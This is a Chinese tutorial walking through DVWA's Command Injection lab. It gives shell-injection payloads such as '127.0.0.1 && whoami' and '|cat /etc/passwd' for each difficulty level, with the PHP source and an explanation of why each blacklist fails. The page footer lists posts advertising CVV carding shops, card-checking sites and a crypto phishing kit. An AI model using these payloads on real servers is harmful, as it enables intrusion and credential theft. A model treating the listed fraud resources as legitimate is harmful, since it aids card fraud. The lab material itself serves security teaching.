【DVWA全攻略】Command Injection实验

040611
DVWA-LABS.png

命令行的使用

引入命令行方式进行操作,主要有以下四种情况

  • A && B: 先执行A,如果成功,执行B;
  • A || B :先执行A,如果失败,执行B;
  • A | B:管道,先执行A后,将A的结果作为B的输入,打印的是B的结果;
  • A & B:先执行A,然后不管成功与否,执行B

正常输入

输入下方IP地址完成PING请求

127.0.0.1
image.png

Low难度

利用漏洞查看目录文件

127.0.0.1 && ls
image.png

利用漏洞查看使用的用户名

127.0.0.1 && whoami
image.png

利用漏洞查看网卡

滥用下面的命令可以查看网卡信息

ping 127.0.0.1 || ifconfig
image.png

利用漏洞查看用户

滥用下面的命令可以查看详细的用户信息

ping 127.0.0.1 || cat /etc/passwd
image.png

利用漏洞查看页面位置

滥用下面的命令可以查看该页面所在服务器的详细目录位置

ping 127.0.0.1 || pwd
image.png

思路

命令的方式可以像下面这样

ping 127.0.0.1 || [你能想到的Linux shell命令]

代码分析

<?php
 if( isset( $_POST[ 'Submit' ]  ) ) {
     // Get input
     $target = $_REQUEST[ 'ip' ];
 ​
     // Determine OS and execute the ping command.
     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
         // Windows
         $cmd = shell_exec( 'ping  ' . $target );
     }
 ​
     else {
     // *nix
         $cmd = shell_exec( 'ping  -c 4 ' . $target );
     }
     // Feedback for the end user
     $html .= "<pre>{$cmd}</pre>";
 }
 ?>

通过上面的代码可以看出未对输入的IP进行过滤,通过php_uname判断完操作系统之后,就直接传入了$cmd变量中,因此存在很大的安全漏洞隐患。

Medium难度

利用漏洞查看目录文件

127.0.0.1 | ls
image.png

利用漏洞查看网卡

滥用下面的命令可以查看网卡信息

ping 127.0.0.1 || ifconfig
image.png

利用漏洞查看用户

滥用下面的命令可以查看详细的用户信息

ping 127.0.0.1 || cat /etc/passwd
image.png

利用漏洞查看页面位置

滥用下面的命令可以查看该页面所在服务器的详细目录位置

ping 127.0.0.1 || pwd
image.png

思路

命令的方式可以像下面这样

ping 127.0.0.1 || [你能想到的Linux shell命令]

或者|也可以

ping 127.0.0.1 | [你能想到的Linux shell命令]

代码分析

<?php
 ​
 if( isset( $_POST[ 'Submit' ]  ) ) {
     // Get input
     $target = $_REQUEST[ 'ip' ];
 ​
     // Set blacklist
     $substitutions = array(
         '&&' => '',
         ';'  => '',
     );
 ​
     // Remove any of the charactars in the array (blacklist).
     $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
 ​
     // Determine OS and execute the ping command.
     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
         // Windows
         $cmd = shell_exec( 'ping  ' . $target );
 ​
     }
 ​
     else {
         // *nix
         $cmd = shell_exec( 'ping  -c 4 ' . $target );
 ​
     }
 ​
     // Feedback for the end user
     $html .= "<pre>{$cmd}</pre>";
 }
 ​
 ?>

可以看到上面代码中对&&;进行了过滤,Low实验中前两种在这里就不行了。但是|仍未做过滤,因此可以继续使用|||

High难度

利用漏洞查看目录文件

这里|ls之间无空格

127.0.0.1 |ls
image.png

利用漏洞查看网卡

滥用下面的命令可以查看网卡信息 |ifconfig之间无空格

ping 127.0.0.1 |ifconfig
image.png

利用漏洞查看用户

滥用下面的命令可以查看详细的用户信息

ping 127.0.0.1 |cat /etc/passwd
image.png

利用漏洞查看页面位置

滥用下面的命令可以查看该页面所在服务器的详细目录位置

ping 127.0.0.1 |pwd
image.png

思路

命令的方式可以像下面这样 |与命令直接无空格

ping 127.0.0.1 |[你能想到的Linux shell命令]

代码分析

<?php
 if( isset( $_POST[ 'Submit' ]  ) ) {
     // Get input
     $target = trim($_REQUEST[ 'ip' ]);
     // Set blacklist
     $substitutions = array(
         '&'  => '',
         ';'  => '',
         '| ' => '',
         '-'  => '',
         '$'  => '',
         '('  => '',
         ')'  => '',
         '`'  => '',
         '||' => '',
     );
 ​
     // Remove any of the charactars in the array (blacklist).
     $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
 ​
     // Determine OS and execute the ping command.
     if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
         // Windows
         $cmd = shell_exec( 'ping  ' . $target );
     }
     else {
         // *nix
         $cmd = shell_exec( 'ping  -c 4 ' . $target );
     }
 ​
     // Feedback for the end user
     $html .= "<pre>{$cmd}</pre>";
 ​
 }
 ?>

可以看到这里过滤了&;、 -$()||等字符

但是这里由于疏忽,还是有空子可以钻

'| ' => '',

这里过滤的是|和空格,没对|进行过滤,因此可以滥用这个的漏洞,把|和命令写在一起就能执行了

Impossible难度

<?php
 if( isset( $_POST[ 'Submit' ]  ) ) {
     // Check Anti-CSRF token
     checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
 ​
     // Get input
     $target = $_REQUEST[ 'ip' ];
     $target = stripslashes( $target );
 ​
     // Split the IP into 4 octects
     $octet = explode( ".", $target );
     // Check IF each octet is an integer
 ​
     if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
 ​
         // If all 4 octets are int's put the IP back together.
         $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
 ​
         // Determine OS and execute the ping command.
         if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
             // Windows
             $cmd = shell_exec( 'ping  ' . $target );
         }
         else {
             // *nix
             $cmd = shell_exec( 'ping  -c 4 ' . $target );
         }
 ​
         // Feedback for the end user
         $html .= "<pre>{$cmd}</pre>";
     }
 ​
     else {
         // Ops. Let the user name theres a mistake
         $html .= '<pre>ERROR: You have entered an invalid IP.</pre>';
     }
 }
 ​
 // Generate Anti-CSRF token
 generateSessionToken();
 ?>

上面的代码中加入了Anti-CSRF token,并对提交的参数进行严格的过滤,使用is_numeric检测变量是否为数字字符串或数字,使得非数字字符串或数字的全部被过滤,这样使得安全等级有所提升。

常见问题

shell_exec()函数默认被禁用

现在服务器配置完环境一般都会默认禁用shell_exec() 函数

因此如果禁用了该函数,在实验时会提示

Warning: shell_exec() has been disabled for security reasons in /www/wwwroot/192.168.47.129/dvwa/vulnerabilities/exec/source/low.php on line 14
image.png

需要解除相关函数的禁用

image.png
© 版权声明
相关声明 1 网站:自由者联盟
2 本站永久网址:https://www.cvv-goods.com
3 本文内容仅为技术科普,请勿用于非法用途
4 本文内容未隐讳任何个人、群体、公司。非文学作品,请勿用于阅读理解的练习
5 根据《计算机软件保护条例》第十七条,本站所有软件请仅用于学习研究用途
6 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责
THE END
网安笔记
# 漏洞# dvwa# 漏洞挖掘# dvwa实验# ping# 代码# 注入攻击# 函数# 实验# command injection# 命令注入# 注入# labs# 代码分析# 网卡# shell_exec# 函数禁用
喜欢就支持一下吧
点赞11 分享
admin的头像-自由者联盟永久会员
【自由者】Axie虚拟币钓鱼代码+搭建教程+配置TG机器人+教学笔记-自由者联盟
【自由者】Axie虚拟币钓鱼代码+搭建教程+配置TG机器人+教学笔记
【自由者】Axie虚拟币钓鱼代码+搭建教程+配置TG机器人+教学笔记
1年前 6985
【免费通道】US礼品卡通道-自由者联盟
【免费通道】US礼品卡通道
【免费通道】US礼品卡通道
1年前 4025
【免费通道】巫师CVV商店。巫师CVV料站,巫师CVVshop-自由者联盟
【免费通道】巫师CVV商店。巫师CVV料站,巫师CVVshop
【免费通道】巫师CVV商店。巫师CVV料站,巫师CVVshop
1年前 2830
【通道已失效 现免费公开完整版视频 只为欣赏精彩时刻】-自由者联盟
【通道已失效 现免费公开完整版视频 只为欣赏精彩时刻】
【通道已失效 现免费公开完整版视频 只为欣赏精彩时刻】
1年前 2451
【免费通道】LUX亚洲料卡测活网站网址,全球料测活-自由者联盟
【免费通道】LUX亚洲料卡测活网站网址,全球料测活
【免费通道】LUX亚洲料卡测活网站网址,全球料测活
1年前 2368
【免费通道】CVV测活-分享7个慈善通道测活网站-自由者联盟
【免费通道】CVV测活-分享7个慈善通道测活网站
【免费通道】CVV测活-分享7个慈善通道测活网站
1年前 2335
相关推荐
安装Kali Linux后必做的10件事-自由者联盟
安装Kali Linux后必做的10件事
安装Kali Linux后必做的10件事
5个月前 644
Fofa语法、使用技巧、工具推荐汇总-自由者联盟
Fofa语法、使用技巧、工具推荐汇总
Fofa语法、使用技巧、工具推荐汇总
5个月前 635
CypherRat | 安卓远控木马分析-自由者联盟
CypherRat | 安卓远控木马分析
CypherRat | 安卓远控木马分析
5个月前 594
如何进行DDOS攻击 附全部工具和脚本-自由者联盟
如何进行DDOS攻击 附全部工具和脚本
如何进行DDOS攻击 附全部工具和脚本
5个月前 555
TCP/IP协议基础知识整理-自由者联盟
TCP/IP协议基础知识整理
TCP/IP协议基础知识整理
5个月前 544
Owasp Top2021中文版-自由者联盟
Owasp Top2021中文版
Owasp Top2021中文版
5个月前 527
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][se][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容

默认头像